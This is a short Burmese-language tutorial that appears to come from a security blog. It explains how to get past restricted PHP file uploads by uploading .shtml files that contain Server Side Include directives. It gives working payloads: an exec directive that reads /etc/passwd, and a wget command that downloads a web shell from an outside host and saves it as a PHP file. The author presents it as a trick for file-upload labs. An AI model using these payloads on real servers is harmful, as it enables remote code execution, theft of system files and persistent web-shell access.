File Upload + Server Side Include [Tutorial]

ဟိုနေ့က File Upload Lab အတွက် Challenge တွေထပ်ထည့်ဖို့လိုက်ရှာရင်းနဲ့ နည်းလေးတစ်ခုတွေ့လိုက်လို့ Trick လေးတစ်ခုလည်းဖြစ်တာကြောင့် ရေးပေးလိုက်ပါတယ်။ ကျနော်တို့ Restricted File Upload မှာ တကယ်လို့ PHP File တင်မရတဲ့အခါ သုံးလို့ရတဲ့နည်းလေးတစ်ခုလဲဖြစ်ပါတယ်။ သိပြီးသားသူတွေတော့ များမှာပါ။ ဒါပေမဲ့ မသိသေးဘူးဆိုရင်တော့ သိသွားတာပေါ့ ။

Server Side Include ( SSI )W3 Documentation

SSI အလုပ်လုပ်ဖို့ဆို File extension က .shtml ကိုသုံးရမှာဖြစ်ပါတယ်။ ဒါကြောင့်လဲ ကျနော်တို့က PHP extension အလုပ်မလုပ်တဲ့နေရာတွေမှာ သုံးဖို့ဖြစ်လာရတာပါ။ Manual Page မှာ SSI ရဲ့ တခြား Command တွေကိုသွားရောက်လေ့လာနိုင်ပါတယ်။ ဒီမှာတော့ လိုချင်တဲ့ အကြောင်းအရာအတွက်ပဲအဓိကပြောကြတာပေါ့။ 😀

 Echo Command

<!--#echo var="DOCUMENT_URI" -->

ဒါဆိုရင် URL ကိုပြတာပေါ့။ ဒါပေမဲ့ ဒါကသိပ်တော့မမိုက်ပါဘူး။ စမ်းတဲ့သဘောပါပဲ။

RCE with Command Execute

<!--#exec cmd="cat /etc/passwd" -->

SSI ကနေ Command Execute လုပ်လို့ရတယ်ဆိုတော့ အဆင်ပြေသွားပြီပေါ့။

ဒီနေရာမှာ ကျနော်တို့ တခြား upload တင်ချင်တယ်ဆိုရင်ဘာတွေသုံးရမယ်ဆိုတာတော့သိပြီးသားဖြစ်မှာပါ။

Example

wget "http://site.com/web_shell.txt" -O web_shell.php

Another Issue with include

<!--#include file="file.png" -->

Include က php ရဲ့ include() လိုတော့ အလုပ်မလုပ်နိုင်ပါဘူး။

ဒါကြောင့် image ထဲမှာ PHP code ထည့်ပြီး လုပ်မယ်ဆိုတဲ့အကြံတော့အောင်မြင်မှာမဟုတ်ပါဘူး။ ဒါက စမ်းကြည့်ပြီးမရလို့တစ်ခါတည်းပြောပြထားတာပါ။ PHP include က strings form File to code အလုပ်လုပ် နိုင်ပါတယ်။ ဒီမှာကတော့ html ပဲအလုပ်လုပ်ပါတယ်။

Reference :

Google

Github